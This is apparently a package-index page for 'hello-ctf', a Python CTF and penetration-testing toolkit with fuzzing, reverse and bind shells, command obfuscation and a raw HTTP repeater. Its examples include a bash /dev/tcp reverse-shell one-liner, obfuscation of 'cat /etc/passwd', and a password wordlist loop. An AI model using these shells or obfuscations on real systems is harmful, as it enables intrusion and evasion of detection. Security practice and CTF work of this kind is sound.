Skip to main content

A professional CTF and penetration testing toolkit

Project description

hello-ctf

A professional CTF and penetration testing toolkit written in Python.

Features

🔥 Fuzzing & Brute-force

  • BurpAsync - Async concurrent fuzzing framework with rich TUI
  • BurpAsyncPool - Multi-worker parallel execution
  • WordlistLoader - High-performance wordlist loader with O(1) random access and checkpoint support

🐚 Shell & Command Execution

  • ReverseShell / BindShell - TCP shell handler with 20+ built-in templates
  • RunCmd - Non-blocking command executor with process group management
  • Obfuscator - 18+ command obfuscation techniques (base64, hex, IFS, etc.)

🌐 HTTP Tools

  • Repeater - Raw HTTP request sender with encoding support (gzip/deflate/brotli/chunked)
  • HttpEcho - Request logging server
  • HttpFile - File download server

🔧 Utilities

  • Local IP Detection - Cross-platform intelligent network interface selection

Installation

# Clone and install with uv
uv sync

# Or install as package
uv pip install -e .

Quick Start

Fuzzing with BurpAsyncPool

import asyncio
from ctf.burp.burp import BurpAsyncPool, Step

async def main():
    # Define your fuzzing steps
    steps = [
        Step("check_path", handler=check_path_handler),
        Step("verify_sqli", handler=verify_sqli_handler),
    ]

    # Run with multiple workers
    pool = BurpAsyncPool(
        payload=wordlist_generator,
        build_runtime=create_session,
        build_state=create_state,
        steps=steps,
        workers=10,
    )

    results = await pool.run()
    print(f"Found {len(results)} results")

asyncio.run(main())

Wordlist Loader

from ctf.burp.wordlist import WordlistLoader

with WordlistLoader("passwords.txt", continue_=True) as wl:
    for word in wl:
        # Resume from checkpoint automatically
        print(word)

TCP Shell

from ctf.shell.tcp_shell import ReverseShell, gen_shell_r_cmd

# Generate reverse shell command
cmd = gen_shell_r_cmd("bash_i", "10.0.0.1", 9000)
print(cmd)  # bash -i >& /dev/tcp/10.0.0.1/9000 0>&1

# Start listener
with ReverseShell(port=9000) as shell:
    shell.sendline("whoami")
    print(shell.output())

Command Obfuscation

from ctf.shell.obf import apply_obf, random_obf

# Single technique
obf_cmd = apply_obf("base64", "cat /etc/passwd")
# echo d2hvYW1p | base64 -d | bash

# Multiple techniques
obf_cmd = apply_obf("cat /etc/passwd", ["base64", "bash_c_ifs1"])

# Random obfuscation
obf_cmd = random_obf("cat /etc/passwd", depth=3)

HTTP Repeater

from ctf.http.repeater import repeater

# Simple request (string format, auto-converts to bytes)
resp = repeater(
    "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",
    use_ssl=True,
)

print(resp.status_line())
print(resp.headers())
print(resp.body_text())

# With custom headers
req = """GET /api HTTP/1.1
Host: target.com


"""
resp = repeater(
    req,
    use_ssl=True,
    verify_ssl=False,
    headers={"Authorization": "Bearer xxx", "X-Custom": "value"},
)

Project Structure

src/ctf/
├── burp/           # Fuzzing framework
│   ├── burp.py     # BurpAsync & BurpAsyncPool
│   └── wordlist.py # WordlistLoader
├── http/           # HTTP tools
│   ├── repeater.py # HTTP client
│   └── server.py   # Echo & file servers
├── shell/          # Shell & command
│   ├── obf.py      # Command obfuscation
│   ├── run_cmd.py  # Command executor
│   └── tcp_shell.py# Reverse/Bind shell
└── utils/          # Utilities
    ├── local_ip.py # IP detection
    └── log.py      # Logging

Requirements

  • Python 3.13+
  • brotli >= 1.2.0
  • brotlipy >= 0.7.0
  • psutil >= 7.2.2
  • rich >= 15.0.0
  • xxhash >= 3.7.0

Development

# Run tests
uv run pytest

# Type check
uv run mypy src/

# Lint
uv run ruff check src/

License

MIT License

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

hello_ctf-0.0.1.tar.gz (43.9 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

hello_ctf-0.0.1-py3-none-any.whl (49.7 kB view details)

Uploaded Python 3

File details

Details for the file hello_ctf-0.0.1.tar.gz.

File metadata

  • Download URL: hello_ctf-0.0.1.tar.gz
  • Upload date:
  • Size: 43.9 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for hello_ctf-0.0.1.tar.gz
Algorithm Hash digest
SHA256 1d67c8a89407fdcc27f70999f6a775efd2d246f48bef0706e73e78d61e7fd2e1
MD5 2bf1f18e8b2c27baeaceb16470a2c49b
BLAKE2b-256 b4c0f495c407cf5693032f98cada286f9b9a81eee1cd918ca125d813d6eb51a6

See more details on using hashes here.

File details

Details for the file hello_ctf-0.0.1-py3-none-any.whl.

File metadata

  • Download URL: hello_ctf-0.0.1-py3-none-any.whl
  • Upload date:
  • Size: 49.7 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for hello_ctf-0.0.1-py3-none-any.whl
Algorithm Hash digest
SHA256 53e14081eb4d65d7d1abcb0f8661d046099738ea8f8e678873219223187a5c79
MD5 348e555b5cb53cf7216c0b8bb4eec0b4
BLAKE2b-256 22e0277662a8ee6353637d7582ee0b05d9443238f82e30c4ee5710a5bc2feb45

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page